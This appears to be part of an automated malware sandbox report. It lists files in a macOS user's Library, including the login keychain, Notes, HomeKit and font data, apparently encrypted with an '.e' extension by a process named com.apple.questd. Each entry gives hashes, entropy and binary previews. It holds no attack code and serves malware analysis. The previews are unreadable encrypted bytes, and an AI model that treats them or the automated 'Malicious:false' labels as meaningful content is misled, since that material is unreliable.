                                                                                                    Entropy (8bit):7.757513692848749
                                                                                                    Encrypted:false
                                                                                                    MD5:128C01E7B0BFD6C587BE43028870C05F
                                                                                                    SHA1:31BDED0CA111DF353DC18F9BD05E0D45ACAC8320
                                                                                                    SHA-256:4A1561D0F981D749BC673FA70D4EA84399D7B936340D14CFA282581A15E05ABB
                                                                                                    SHA-512:471A3A37E2EC349F07EC7D08075C10C73BAD7C75521F8723E4D4862BD8E04607C743450F762E7C699A3A5F6718CD5AF966371C5D565DFCC61D4E06865614205E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R.....g..0.5=......d~...7....Ec\..}jL...HX....u...Y..N...D..Be..N..vO^.z{b..dT+0..n.(@..M.....\H...@..x;.zA.................V.-=....2..a....].O]H.`.GA.TR2..x.r....jOb...04^c..5..hD.'T.........-...+.u(...g...[...d....$.+.*lb}.[...Kn.p@5...2..!..J8X#.......K%.E.Ml.g..H...QR...j.R.......o7.3A........mQ.6.7....r..............*_.gz..=..6W. .V.rC2.....a.)...N.....B$>.......Pc5.Y..!...N-.......S.R...*.f..D..i.[..^....2.<;.......n6...V.T...Q.}...r...q.^1..U...d.._8.....,*..=2Hi.....?.......x..^cG."....^....5).7............Q4.........nP..H.......-.&q;T7..D,...j.O.r.....S.0Pz..B.....W..0.......D;...%y.aa/.JD...nQ5^c..5..h/../8...mk.9.........SZV..h........a.6....'N.<.<A.....(..#.~ePr...LAnY..6....P.._P...vs/.....-..~UT..q..b...#&.v..E...h.,.%1...5..nw..R.f....1....5u.(&.......R>..o)U...T...'....R...)......>j....H.n(d....A............@..x;.zA*.........g".T..:.b.......'<.F..)...cX.bC..!.v.~.".......w_B.b.Nk..."..~....:m.f9....|.....r...\.ti..x.A..^...)8#.#>.0.+..}...+.?.12.7.:.,/Zp....0!o...-
                                                                                                    /Users/ben/Library/FontCollections/.Fun.collection.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):1186
                                                                                                    Entropy (8bit):7.312592820826152
                                                                                                    Encrypted:false
                                                                                                    MD5:B52D986F73C5AF68474DC3286863330C
                                                                                                    SHA1:FFB5865AE0E20E975FD6CC984008B3F6A3EE8F94
                                                                                                    SHA-256:77245EA4D3A61827C042BF101E10286C6B13032B693BA459E77039AAA7DB1456
                                                                                                    SHA-512:3C7744A32ED6564A3A4A28220430472035A40F97993793F5FC85F1AB1C17D193343FD85A0832A28A11732C59E7B3DDE57186DF9C07BAAFD67C807AE290220AB7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R......#f.9.....0..&k..A...&.e..Kz!........U{p7fw.L0...BL..........G.}.<3....VZ.0..[)....T-35........7.!......b..i8.d.z..G.uv9J.6.....C.M....V..*...._.....W..N..M)..r...p...v4K..*$J...:.,...p.2[....h..\.y_2.kEI...^F.Z.j.0.'\....].O]H.`..Q...t.....bkG..R@.}...P..j...iT...wS=}m.D;..A_V.O....9....E..."q.b.h.@.;ad..w`.mQ.^....%...5....op..S ......o$.q.~.v/.....C..W...T....j&[f...@......T9...{.V>......L..:.5.|....E..t?p......_..35...... .Q....M]..y..=....8.g..Y......mDXc..h2...$:BM.........(.,.......|....c.Y...o...N..Os..&..U=...r..x.c./\...2.l...i...Q...y9..6.}.y.F.d.#..G^[.xT.....x....`...ow*..=2Hi.~..o@Gd.`E...O.g......G.jj....D.nP..H...h..?..|N..ic.V...0...p...}`iM~....,....a...V..f.W2..d..\~+.J.`d/.w1.%3.9......X!Dt\"....B%.}...O.......~.|..1......i.v2J..Xf`..MQX"W..HS..F....yPK.....8.uz6k.....EdU.LCX..A.;|.O...-./.Q._J. ..}..Q..lR.aM..............Ow_...~t.*......q................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.....
                                                                                                    /Users/ben/Library/FontCollections/.Modern.collection.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):1122
                                                                                                    Entropy (8bit):7.242948750288335
                                                                                                    Encrypted:false
                                                                                                    MD5:53E9E757E02CF6BA7AFB86692DEF87C9
                                                                                                    SHA1:F3F54EBA520FE4FA1623012FECCD25BBEB0EFBFA
                                                                                                    SHA-256:D9854F2E26AB1CE860346F957BD194120A01856673B2E505338BEE8621A81F94
                                                                                                    SHA-512:AEAFD17BAB03553B72F1982060465BEAD6D5D12D0D7502FD2AE44634CA3EE0D6B1BABA44B9127BBC02BF047508B7310A2769CB8B593E0ED25B1C0CB2C79920CA
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R......#f.9.....0..&k..A...&.e..Kz!........U{p7fw.L0...BL..........G.}.<3....VZ.0..[)....T-35......./...K.6..[/V!.oB2..aJ..H.((...+P.<..Q.........2.:......T.......Qr(........"..................B`..h.....V.O....9M..t...IQ....]....9]..e..T....w.kf..&..zcZ<.?....S\E....G...Y..n...q.^1..U...d.....b.`w.o.7....x./p...l7G...INIV..G.5......T@..G...|k.@......T..j..!.V.U..CC7.a........in...7....U.,...4..\;.L.w...A>.=d......Sh..O...y.d._.!1..c......y.x.r....E.#..P@f.V|Oq\p..d..$g.G.^bk..'$+..C.=;......J.v...!*_...Y.u,.......V`i....Hm....U9.."If....A...#....RX% e}X.i....}.hwj.KoL.;:.m...c.. k.V.....x..h.....qx..HPS..=.U.S.1.#.H....2..N.v..R....... ..E.'....|........$..u"......]..M...~.b..VJJi...._+J`|....|...an...66..?j...C(O.TY..[2..............u.~.5...%>...]..KS...b..a...m....)...x.ba.{2!.>..=..................1................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ...........................
                                                                                                    /Users/ben/Library/FontCollections/.PDF.collection.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):1170
                                                                                                    Entropy (8bit):7.290007923184602
                                                                                                    Encrypted:false
                                                                                                    MD5:B7B7A3CD6273BC964FA2E0FDDAF93E6A
                                                                                                    SHA1:C1A54D0BA580AE1539468C0B0198827FA846D283
                                                                                                    SHA-256:CA0DF141BEEAC0E8F2933BA2513ADD13C9A291967B4A5BA52EAA0E61C342E978
                                                                                                    SHA-512:AAD42C578EA194B8C14835A90A7A60B32D39272B5977AF61356A481357F3724877C8E8233E129CDD05280F9DFF70281784E663F23920E5C4052916D4C6785AF5
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R......#f.9.....0..&k..A...&.e..Kz!........U{p7fw.L0...BL..........G.}.<3....VZ.0..[)....T-35........7.!......b..i8.d.z..G.uv9J.6.....C.M....V..*...._.....W..N..M)..r...p...v4K..*$J...:.,...p.2[....h..\.y_2.kEI...^F.Z.j.0.'\....].O]H.`..Q...t.....bkG..R@.}...P..j...iT...wS=}m.D;..A_V.O....9....E..."q.b.h.@.;ad..w`.mQ.^....%...5....op..S ......o$...uf...s.I...K1.M...q..1!.I?...A...F......S.R...*.f..D..A......$-.h..g.M.w1l.z..Q4v.DF.LR.px+.....H^...5l..r`B....u.pt...q..l...gb....]...}d.F....K.q.qr....B$.(..m.3.7....f...P~.s...D..7.......y..Rz.B......b(M.0..8..;..........~..4*..=2Hi.".<...D.`E...O.g......G.jj....D.nP..H...h..?..|N.qI@.o.E.0...p...}`iM~....,....a...V..f.W2..d..\~+.J.`d/.w1.%3.9......X!Dt\"....B%.}...O.......YSI..ns..r.Q.y.8.oa5...!+s8.m.`.L..,.W..T.....Q0...m.<.in..l.`.d.kh......1....f%.Q..\.8|.}..Q..lRf...h.............J.~...h..?..|N.a................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N
                                                                                                    /Users/ben/Library/FontCollections/.Traditional.collection.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):1362
                                                                                                    Entropy (8bit):7.4245437692722644
                                                                                                    Encrypted:false
                                                                                                    MD5:60D6C80E9A520535963B6495D5E1E9FE
                                                                                                    SHA1:CFE38D6497A7AEF4C9B7BE7B8F1A4D84D16F67F4
                                                                                                    SHA-256:7801D58222B8D4986C11328A21B76FCC2D3E78279BD3B46D9E2B83FDF7487A63
                                                                                                    SHA-512:DEA2123A6935434DCDCF7CCB4F5ABDED815808B94337BE995707785061FFBC4D02CFD8AFD7FD7E41F8FC8B2A400571AE949EC7AD0C9F52455115727AAF3C74ED
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..Bc\.....<MJ`.AjTg.4po........{.n<...1...mg~@A..i......hn.].O]H.`.....#..L....5D...........}Y...?.4.c.$(..._.d-.X.:...,.\.Wv.............j.....]./.pq`Y.Y.P.I..r......2...._.....R.i...}............WY.}..........sO.....C*....=..............zM.5i..:x..o.s.......y.....G.1.a.>5.....................,.z(...8.N..%...4-...]..BMB......^.KU..=.n.e...c....Bi.... ........8...<.b...j5......I.P].uT..j..Q.K.|....R.k.^X.uD."...%...*lb}.[...Kn.p@5........BL..........eU.Bf.6...$Q^...b...Y.X.>..0.....4...[.Eg...0...?c!...?...k........)..MC9.........)......#.*V.O....9..3.....9>......r.l....Di.]6.C.R.......,.....Pw...Q.s.b.$.mk..+om.xR.S..`f..z.........!..*:W..$.......TqpQ>..L.......1........+.......jP{eY.=.......=......\..kbK..4...;..W.2.\0r.v5o.>..M}~.wq.~.)+../8.U.,...4..[.'R.8.....i........QRf....E.../5".((.....cn...<..*.D.=W$a....U..l3tZ....R.lG|..N.'..r...A..R....'1....0.c.....n.......L.Np........E....U.A7.."......E8..v.....;.....i....c?..Cq.....zA...#..x.....0.......V..}.:.......qe...d.....p..
                                                                                                    /Users/ben/Library/FontCollections/.Web.collection.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):1474
                                                                                                    Entropy (8bit):7.467190337323625
                                                                                                    Encrypted:false
                                                                                                    MD5:7E4CA7CFFBF616D4F73CA7A427E3A812
                                                                                                    SHA1:3767F1AD15C2B7788883BE32B12D694597C05563
                                                                                                    SHA-256:B1B9FD33C6F9F2462436F3D9D6ACBD4A118055990CEE954D3F7B5C77CF983417
                                                                                                    SHA-512:047685D292A3A233CEBABE2283DC6A8412AA1BF7B36D6D96AF9BE2BFF149849C0D8E1655EB8EC9D114687D52D26F6861FED5A462947D4D7640DBAEDEFED12329
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R......#f.9.....0..&k..A...&.e..Kz!........U{p7fw.L0...BL..........G.}.<3....VZ.0..[)....T-35.......Ghc...s...R....9.O....I7.DU....ij=...]d....^7]r..bgv#.B..,.....@..x;.zA.V.....l.....k..xP....~g(....2.....7..v..].O]H.`.GA.TR2..x.r....jOb...04^c..5..hD.'T.........-...5.<........\}).E........g.....<.......OJ..,....Q....].....V.T......f.....70..Tr...s..j.......!!.[.Eg...0...?c!..P.q...i.}..........w..k..CC7.a........iD..k.N...U.,...4..\;.L.w...A>.=d......Sh..O...y....%....c......y.x.r.....;....r.E`....u....v.~.8..P...O.L?....`......JC.(.'~.....2...<.....LG...w..{.....1.....nY....:.&Tj..'...qsT.@...u.Os.?ne..a..w.q...:...7.............*...E.../?i...~...HI...&6........&9...G..7...C@.S..ii_N.4.Z......"7......^.7.8h..C(..c!.cr&.....c...F,.......kl.o..F0.Q.#..Yh.U.M.....b.,...d8.t..[...F..H..o......*..=2Hi.~..o@Gd.`E...O.gO ....:t.IV.t.k.8G ..3..h..?..|NS.7."..#.0...p...}`iM~...W-...A*.............*.`.........q>..1[....5!....?..l%..R(..RL.?w...c.V.@.....U.2...P.G4.yN.6s........C..h1..h.z
                                                                                                    /Users/ben/Library/Group Containers/group.com.apple.notes/.NoteStore.sqlite-shm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):33091
                                                                                                    Entropy (8bit):3.3744282527522276
                                                                                                    Encrypted:false
                                                                                                    MD5:5578DA93DB4B9A43F0BB82864F425B9C
                                                                                                    SHA1:0CE0A39D85738D049C9A1F9168760F22E9BFAE06
                                                                                                    SHA-256:6F204CBE588D00B0F751C52066AF2671A517EFAF74D14A6313A6FB8B78FF3E4E
                                                                                                    SHA-512:2E381D9D283ED5869E1AB05BCD3E20C94C429CA9422F56C978AE52A427A6A7DC2F10A450E5F444DD78451A64719C61293837D9FABF1CE4529F562786BFB02EB5
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: >.k....L=&.E.....uH......A........S.........B.h.>.k....L=&.E.....uH......A.........il.6:....B.h.........n.....<..9.o..h$.....................R,...R.Y.....T...u%w.g.......G...BAy.~p.u<...s.ut%.o/2.Z"\p..:....=..R.Y............................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Group Containers/group.com.apple.notes/.NoteStore.sqlite-wal.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):82791
                                                                                                    Entropy (8bit):3.5294718662688007
                                                                                                    Encrypted:false
                                                                                                    MD5:C2BE3AF8DFF1D2A9404B40B1E4A34591
                                                                                                    SHA1:2511141D32720725225F48B98C4CAA70B4A34A4C
                                                                                                    SHA-256:DA255A787D77E39195C5A099FDF2DE6CF5DF07687CCB7980A2588C0713A9A4CE
                                                                                                    SHA-512:E8DCE41F658301E84381E799FEB383CFC0BD03B35D990DD5A84BE4B2BD0979CF64524DA9F72BBBBDB2EFDC167410983A71982CE91005C6494349162736FB17D7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: @....[...L.-$.....S.....`...EZ}.o...?.Bq..S......`.....r....X......*L5x9G.Ii^....m............8......B....N&.>.=.................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Group Containers/group.com.apple.notes/.NoteStore.sqlite.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):225711
                                                                                                    Entropy (8bit):4.6014409448318405
                                                                                                    Encrypted:false
                                                                                                    MD5:944D6B91BF500BEEDFBD0A5717A9E68A
                                                                                                    SHA1:491149EAC7F5E13C1565803681D780D88B10F26E
                                                                                                    SHA-256:817FE1F5619F4AEC83CE2432D45AFEA37C2CB8328882FE96651A36AB5B47113E
                                                                                                    SHA-512:C96D11186464A5FAD59BDE49CD61470466307657EF8452D18E8FE47FB3CAB24BB12434AD76C34954F38B1AFDC12CE0FA59A0BE446BF5CAFD338052501CFDD6FD
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT........t....)...........t..py;B.^....Z..t...7...t...7............L.D<.+.......]!..k.t:.pT....k....yPS..}...TP...2."4+...................................................................................................t....J....d.f.`.~.A.Bl'r..|.(..../.b.N.....)L.|...+]LI..k)5r.M..G.j...d.o.f.3.c.!jo.F.yV.....+vG...n..eJ..?..nS....s....4.....4..z_g..g.o\K...".P....h...~C.........!5..-g.....J...!~.8...T....H..x...n...m.....k..<.;.';...k.x..>..[N.Xk]J...72...WtL......m..C....nc........C..^.m.^<..H+^....~s)..r..ln....).U..2G*M.-."......^.m.^<.....Z.m.G.j...d..F....d.c..p..6...*..=.U.t$/,.....Q..B>7...p......y.S....c..=b\...bB.b...e.Jz....B5.eL.h...v.o.`k%.U...{?.H.V...We~..B..3.1.+t9l~s)..r.._...;4..v.9.4.|]]M~.J/.....98..c.:U...~...A.C#..EA.S.......X.w.P..D.....C.2VQ..\......2Q.B.........4......K...4........j..K...4.S9. *..O....2.X.rJ`..........;...!...@.2....2.Q...S.)-..~s)..r..m..b/x...%'@..VYG.j...d...r...(...f..X.q.....O*g.........q.5....9(.wY..^.j.....Mu......5...]..e.
                                                                                                    /Users/ben/Library/Group Containers/group.com.apple.notes/Library/Preferences/.group.com.apple.notes.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):730
                                                                                                    Entropy (8bit):6.7514397814106495
                                                                                                    Encrypted:false
                                                                                                    MD5:D1D54AC57DA17726A235386F855324C3
                                                                                                    SHA1:7BB9CC86775129152C81822F35B8A14D7C6F92A5
                                                                                                    SHA-256:EC017A56E3594DCC8CD3378606C7A505782FCD41D89C5A73D16AF741A1A09A4C
                                                                                                    SHA-512:2452A2C060625A9603CB6090ED29960B8EBFDFA9DDA42C60033150EE1749BB389D2B0D0DB1F01A626FA172AF3E10832956707110603698FA53A4FB600EE8626D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R.....Z.[H..=.....g.T..mr.L...........<j.@pF...2.._X...G.....>.....7.hF#T....g'.bs..4....!.....*...H$?6......... ..d.~K|.......h.TO.U......4......H....6.E^......ZNz.S.......gw1?..J..'..>B.....$.....S]...H....e..A......Ao.K.W.....x...P\k.).\..,I`s..f..D,....d...Y......I(...w..2g...#....PiIV]q.l......a.(.........]G..y.`......J.........T.m..P..'..!....L..].l.. ......VJ.......Pd|........i....\.....M.Of.M{...#RoxO.....0...................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Group Containers/group.com.apple.stocks/Library/Documents/PrivateData/.com.apple.stocks.private-production-dbstore.json.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):1122
                                                                                                    Entropy (8bit):7.272760568338147
                                                                                                    Encrypted:false
                                                                                                    MD5:3D4785C35370D2AF067904B265F2D101
                                                                                                    SHA1:59F32F325E2C7B88408B293AEF1963CC86481414
                                                                                                    SHA-256:7269CFB0F62AAE3BC64DEF791745F6EB3301AB0506E0A95D1966477A69D5FF89
                                                                                                    SHA-512:3144B4A0ACB5D4B4CAD636BC20CCAFBFB375A8E35FE220E332712A2AFCC9A151172259AD4A86E81F32FAF48B40EF377B737408C1ABAC6E76BE4291DA8A2EEAEC
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..)...+.....n....gB.s0k+\J....w5r..V.....J....e...3:....,=.k..U.Z.YK.$....h7c..Ew...4..-..l...:.O....F].#8./N..C.H2(..l....p.GG|.`;..m8....a.(.v.U....-.......:..6..C*w.CU."_@..v.......yG.J."%...D....S..%G..o,#..D.....)0YR.c.&.......1.?.?'].s..dX!.x....L.ww{@.}S........y....U.i`|.^N.&.j/...49....9.^..........ct..d...~z..Q...a.@.TkD...-L..3.........{.....S.Q...R.d..Lrc..9zB..%ZL.jL.t.@'....W=...7..].....yB...FW[.......$....r..:k..@.X.......P.4...ms....gHE/...e.R...).!vK....KqP|k....(!Tga..]..J.h."^...S.'....W..".Y.m.A.2...2K.....5`...>Yr.._}..M.W.8.......n..tS_:.....Z>.N....|.........|.|W......Q.SNVL....!G....v...:..Y,C..~...F.....m........w%.d...xlG....<f+..l.....(..s........S....[.XE..<..4..@...xj....y|.w...;.*..a.X.....[UNb. ...|P.zU..ja.[.J...u.K.=.g....$....qj.A..e.......L..*..&O/Ha..bG......-...6......1................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ...........................
                                                                                                    /Users/ben/Library/HomeKit/.datastore.sqlite-shm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):33091
                                                                                                    Entropy (8bit):3.346991440266962
                                                                                                    Encrypted:false
                                                                                                    MD5:AC2E35EC61EC5CF90266125ED0A01939
                                                                                                    SHA1:68942B80A970EB9EA83AB59175D08821CCDFB3FF
                                                                                                    SHA-256:DDC869A03D912326A2B5E2A2E253BEC8EBE73C76B2285C4E121C465438A77B76
                                                                                                    SHA-512:2E3932F92D556899D7484EE49E3F8BCDB0EA2B715C2A22C27CFFB73D6EDBB0BF8DD1213E1DEA646D4595885B7127AC33872391D4C06479E54C70739FB2C83226
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: >.k....Lv...S...X"...~.)F.....J k...ge..l.X1.,..>.k....Lv...S...X"...~.)F.....J -jk...S.l.X1.,..........pD....|U.9.o..h$.................y.H..........d......Cj..y.H..........d......Cj..y.H..........d......Cj..................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/HomeKit/.datastore.sqlite-wal.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):74542
                                                                                                    Entropy (8bit):3.5597008469826594
                                                                                                    Encrypted:false
                                                                                                    MD5:B79D8186390812D0D2D5AEE225317710
                                                                                                    SHA1:43994B99CDDED73AE283240388D1C2A9697D48D5
                                                                                                    SHA-256:73B6670B70AEE16070E5E82141D6B1CDCAA7DAEB79D344737EAF63FF41D4E0E3
                                                                                                    SHA-512:D08E71B4EB8AE9A8012E24E260E4F8365F1C6D6CCB09EA0589F6791D58ABADDC61510D41C450AB464A79D8E289A7352D3249503B27ACEE261ACF6C2831DFF4D4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: @....[...L.-$...k...ge.....Tu.f..B......k...ge..).gWru...UmD.%Aw...I.............L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/HomeKit/.datastore.sqlite.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):61781
                                                                                                    Entropy (8bit):3.660900052781229
                                                                                                    Encrypted:false
                                                                                                    MD5:42A5A7A8D3CA68FA0BC9C9FD765D41C9
                                                                                                    SHA1:335C7173ABC10ED850E985A628E66CF9BED178D8
                                                                                                    SHA-256:A0A42276B7FBA4C3799A7C2103AC50735BBCFDC9368E54E841049374A825E555
                                                                                                    SHA-512:9D87900BFAD129CCD94221BADCE4FDBBD04DBA4D68E9198C6A87D663AC4FECFF222A27E6B4E6410B0ADD03A710CDCDB778FABE45CFEE755AE7CEA8CA9D81B130
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT........tf...s.I(..........6...<.........t...7....................L.D<.+...B....[,,.<.~.../k....aX.....z..E*.YZ.@.HiH.;.8.........................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/HomeKit/.plain-metadata.config.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):329318
                                                                                                    Entropy (8bit):7.976947665315097
                                                                                                    Encrypted:false
                                                                                                    MD5:D131F40ECB5AF6348B85FD8B9714C60D
                                                                                                    SHA1:9723687E027B027E3D69D76D68825D50F18DF759
                                                                                                    SHA-256:C5143B4589B802E00A817148BC29322210C6EA92726685AD289E0815123698A9
                                                                                                    SHA-512:69379F7E0AB75C10D54CF1459D8D7ABB08B68CCEEC365F43B477F14052C55F9BA35B29618ABCCC64E6CD2EE605504F9C496C60429BDBC51D160C9B75BA6EAACB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ...#......}PmZ.C....n..Yj.....n.......C...m.......DV.R..B.Y...aIf.........7.?P..|.X...J+.S...Y.........C.....u4..t.^j..OYRQ..d.......9.hp+.l.............5.....S<|o.M...:........s.hq...........L.2b.Y.S.H...j..`..H._.m...l.....F..F,k.8OL.!a..5.s...z`..F.Il....:.o.....2..>.*..z...y.j......z.O..t....../....#y...z.{..&...%.......[!@.U.E\lS!\7.z....4e&#*.....\..F$..m.....C....P(......!..?)d.eD....VL.;...L...).0....bb...TW..M\>.....C..V.USh$.a.Tix.........Y.gr.a..g7.b#.[,h.&.R..g.2+F........n..Hh0.v....LQlG...h9..by..1......5=....@%....1V...B.gH.y)...4...h*w.. ...u......."G....i.....C!pw..3..%.e.7Qr....x]........sz%g0..0b.....X......{i......b.HX........U...t......Z..................u.............J...Qt.eq.....fJ.,..,...Hl5.8.#.n.._.:V.>..C...16.C..M6.1rt.Z..../.2$.-.(p...S....1.Xj..._.>.A........ .)....6..........'.$.......2...&..~u.".NL..}=r.B.3..u..8.ZD....R.q`IT...#..`.nY..f..@b0..5.^2.....|....Q*.>....=..........]....fdP.Y..........Y.:..q.....Q.[..x.:..C.)......nLj..:....].A...3V.~...J..o
                                                                                                    /Users/ben/Library/Keychains/.login.keychain-db.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):178100
                                                                                                    Entropy (8bit):7.897841787147559
                                                                                                    Encrypted:false
                                                                                                    MD5:AF1A3A7D9AA32490EE7E0DF8F826FC34
                                                                                                    SHA1:B46296500F11986B2D03FF4640DB081247A7E365
                                                                                                    SHA-256:641763B7FFB32A6A7DDE84E04BEB679F70E5C4F3B195A53C21FE257D7E6E87E3
                                                                                                    SHA-512:8D2E80F2AC1656C4B1547722F1CC6D10F96E912220D4D082DDF2477192B07A401073B75542273C58B48C59D6BE56C216A4651EECA7EBA6F4E6D81EB5C7AEC4A4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .^Yc.......&..!..8.....J.MIjK..X\p.... .U"..(E_...l...(.5.....D..rh...uu..bH..G~...-%......f}_O~B..F........N/.....wd...1...)^2"..}.9$...1.,..MB..."=..S.o..B.qAt...7.............0.......io. g:........>.&...).OVp...C.....{..Qt...7.............0......#..l..u........>.&...).h.i<..$N7...A...p.v...})..........z...:`L...{.7i...s.K.G.@..#G.vS....o......Y<$[.2....7.t...7.............0......j..J...........>.&...)........D...+.+...m......t...7.............0......5..u@.=..D....Ut...7.............0........>@.02$...D...t...7.............0.......nEV.Sz.K.....Mt...7.............0...........`..pN...(677y\..f.t...7.............0......5..............n...I.. 1.3..U...S.e.......a..pk..........z...:`....R...E.P..8.cD.. .i..K..}..sYa.5.&..0j0...^.V...ZH.............z...:`L.U.H.Z......-p~D.. .i.........*.|VQ4.$.}..|.#...o...k.C..........z...:`.&.ut...Y.f.^iW..y.:I{oOZ.:#.....e.e........w.[..C.b.....h...5.s..:J..]`b.Y.9.qK..:J..]`...........=T...et...Y.U.?..CJ...........x........X..........<#Jv-&.-..|...x.A.s
                                                                                                    /Users/ben/Library/Keychains/.login.keychain.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):152651
                                                                                                    Entropy (8bit):7.884932079168592
                                                                                                    Encrypted:false
                                                                                                    MD5:58FB378B0C2A056351E68EB50509603B
                                                                                                    SHA1:21AA92A2C6705D12D17393BF815CABD574745646
                                                                                                    SHA-256:EC04250F91E106A34EC83FC01F9FC898494E5D03414A9DD2BD6DBEAB5A667E32
                                                                                                    SHA-512:63CF2B6AE9F6E48F5AE2A754CAC16654D0083A5D724EEC35C2B14884EB4E84CFB3070E3D6DC5C80AB5C398EFA9434AD8648F20745B673772863C50A2CF98BB95
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .^Yc.......&..!.,.N~.N....~./....?U.(.po$a9O>..:..?PK.......jACkN..iu......^@...;h..C.....~uw.WH.&.Y.'....XR.2)...p.R.....K..R.8....]..t6Kf.q....o..B.qAt...7.............0.......io. g:........>.&...).OVp...C.....{..Qt...7.............0......#..l..u........>.&...).h.i<..$N7...A...p.v...})..........z...:`L...{.7i...s.K.G.@..#G.vB..GB..I.n~[i.!..2....7.t...7.............0......j..J...........>.&...)........D...+.+...m......t...7.............0......5..u@.=..D....Ut...7.............0........>@.02$...D...t...7.............0.......nEV.Sz.K.....Mt...7.............0...........`..pN...(6.D.....~....F.............0......5..............n...I.. 1.3..U...S.e.......a..pk..........z...:`....R...E.P..8.cD.. .i..K..}..sYa.5.&..0j0...^.V...ZH.............z...:`L.U.H.Z......-p~D.. .i.........*.|VQ4.$.h.>.._..|h.S....\'.V....w.t".../v<.....s..YV..6.!..2t....!.X.5crB......N1C.....A......<{6....d.....1.v...s.s...X....15....1*v..1.Pm...Z.L..t.....2PaUZ.h......24..........G.!;N}.....S.....h..lT.L.yoL.....:..%.
                                                                                                    /Users/ben/Library/LanguageModeling/de-dynamic.lm/.dynamic.dat.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):338
                                                                                                    Entropy (8bit):4.679622683060389
                                                                                                    Encrypted:false
                                                                                                    MD5:A4E1759E575505788E84B1232A012146
                                                                                                    SHA1:5541D72638228F0E6F08CFCB5B7E6A9A37830CF1
                                                                                                    SHA-256:D3A2CF1700887D1C3F6B1EB6E20A32D4DE35C7FD8E3F58C1021893ADF5585348
                                                                                                    SHA-512:2E5BAC93B216B0BAB7FAAC4002BD50D1E757DBFC3EBD61BA51D99E4BD665B29A4D9E30896E088A229F57FED54264480D73D5DCDDAC72A5A84C72E54CFE8ACEB8
